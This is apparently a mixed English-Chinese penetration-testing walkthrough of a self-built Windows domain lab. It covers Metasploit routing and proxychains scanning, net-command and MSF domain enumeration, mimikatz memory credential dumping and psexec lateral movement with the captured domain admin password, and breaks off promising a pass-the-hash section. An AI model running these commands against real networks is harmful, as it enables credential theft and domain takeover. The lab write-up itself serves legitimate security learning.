1. Environment
The domain environment is self-built, basically imitating enterprise deployment
域:learn.com
操作系统类型 IP地址 本地账户/密码 域账户/密码 角色
Windows 2008 R2 192.168.138.129 Administrator/ learn\Administrator DC域控
[email protected] [email protected]
Windows 2003 网卡1:192.168.138.130 Administrator/ learn\win2003 域主机/
网卡2:192.168.47.159 root win@2003 外网站点服务器
Windows XP 192.168.138.131 Administrator/ learn\winxp 域内主机
root [email protected]
Second, the penetration steps
ps: Because it is an internal network test, the previous steps of entering the internal network from the external network are omitted! That is, it is assumed that the attacker has taken control of the windows 2003 host.
2.1 Information collection
2.1.1 IP-domain information
信息整理
账户: learn\win2003
域: learn.com
内网IP: 192.168.138.130
外网IP: 192.168.47.159
域控制器DC的IP: 192.168.138.129
另一台域内主机: 192.168.138.131
C:\Documents and Settings\win2003\����>ping learn.com
Pinging learn.com [192.168.138.129] with 32 bytes of data:
Reply from 192.168.138.129: bytes=32 time<1ms TTL=128
内网主机发现:
1、在metepreter的shell里执行: for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.138.%I | findstr "TTL="
2、建立路由-代理进行内网扫描(参考 2.1.2节 )
2.1.2 Establish routing-proxy
run autoroute -s 192.168.138.0/24 #通过当前session建立一条通往内网网段的路由
run autoroute -p
Method 1: Scanning module that comes with msf
主机发现:(自己用来看看效果吧!)
use auxiliary/scanner/discovery/arp_sweep
use auxiliary/scanner/netbios/nbname
use auxiliary/scanner/portscan/tcp
use auxiliary/scanner/discovery/udp_probe
use auxiliary/scanner/discovery/udp_sweep
端口扫描:
use auxiliary/scanner/portscan/ack
服务扫描:自己挑着用吧!
search auxiliary/scanner/
Method 2: Set up proxychains
use auxiliary/server/socks4a
set SRVPORT 3333
run
vi/etc/proxychains.conf
socks4 192.168.47.147 3333
sudo proxychains3 nmap -Pn -sS 192.168.138.0/24(由于在域内,单纯的扫描可能识别不到,可参考附带一些常用端口去扫描)
sudo proxychains3 nmap -Pn -sS 192.168.138.129 -p 3389,445
2.1.3 Domain user information collection
Common instructions
ipconfig /all 查看本机ip,所在域
route print 打印路由信息
net view 查看局域网内其他主机名
arp -a 查看arp缓存
net start 查看开启了哪些服务
net share 查看开启了哪些共享
net share ipc$ 开启ipc共享
net share c$ 开启c盘共享
net use \\192.168.xx.xx\ipc$ "" /user:"" 与192.168.xx.xx建立空连接
net use \\192.168.xx.xx\c$ "密码" /user:"用户名" 建立c盘共享
dir \\192.168.xx.xx\c$\user 查看192.168.xx.xx c盘user目录下的文件
net config Workstation 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user 查看本机用户列表
net user /domain 查看域用户
net localgroup administrators 查看本地管理员组(通常会有域用户)
net view /domain 查看有几个域
net user 用户名 /domain 获取指定域用户的信息
net group /domain 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain 查看域中某工作组
net group "domain admins" /domain 查看域管理员的名字
net group "domain computers" /domain 查看域中的其他主机名
MSF module
run post/windows/gather/enum_ad_computers
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_ad_groups
run post/windows/gather/enum_domain
run post/windows/gather/enum_domain_group_users
run post/windows/gather/enum_domain_tokens
run post/windows/gather/enum_domain_users
run post/windows/gather/enum_domains
信息整理
域: learn.com
域用户:Administrator Guest krbtgt win2003 winxp
Use the built-in mimikatz of msf to extract account passwords
load mimikatz #加载 mimkatz 模块
help #查看命令
Mimikatz Commands
=================
Command Description
------- -----------
kerberos Attempt to retrieve kerberos creds. #提取域账户密码
livessp Attempt to retrieve livessp creds.
mimikatz_command Run a custom command.
msv Attempt to retrieve msv creds (hashes).
ssp Attempt to retrieve ssp creds.
tspkg Attempt to retrieve tspkg creds.
wdigest Attempt to retrieve wdigest creds. #提取内存里的账户密码
meterpreter >
Thinking:Entering the intranet, we want to get domain administrator account permissions more, we can forge certificates for PTT attacks, or get plaintext passwords directly! ! !
(Prerequisite, when the host in the domain does not have system-level or general service vulnerabilities)
2.2 Lateral movement of the intranet
2.2.1 Clear text password in dump memory
In order to easily obtain the password in the memory, the domain administrator account is used to access the win2003 extranet server.
**In this way, the account and password of the domain administrator are obtained: ** Administartor/[email protected] is
here, you can basically walk across the intranet! ! !
比如前面我们知道内网还存在一台主机 192.168.138.131
简单演示:
use exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp #注意,在内网中,往往网络会受限制,通常使用 bind 系列的payload
set rhost 192.168.138.131
set rhosts 192.168.138.131
set smbdomain learn.com
set smbuser Administrator
set smbpass [email protected]
set lport 5556
explort
Three, summary
but: In practice, we can't get the plaintext password! In large and medium-sized enterprises, hosts under win2008 are basically not used.
Next, we need to use PTH PTT attack .
Tired of writing, let's do this for now!
We will continue to add the PTH PTT attack part later, look forward to it! ! !
PTH and PTT attacks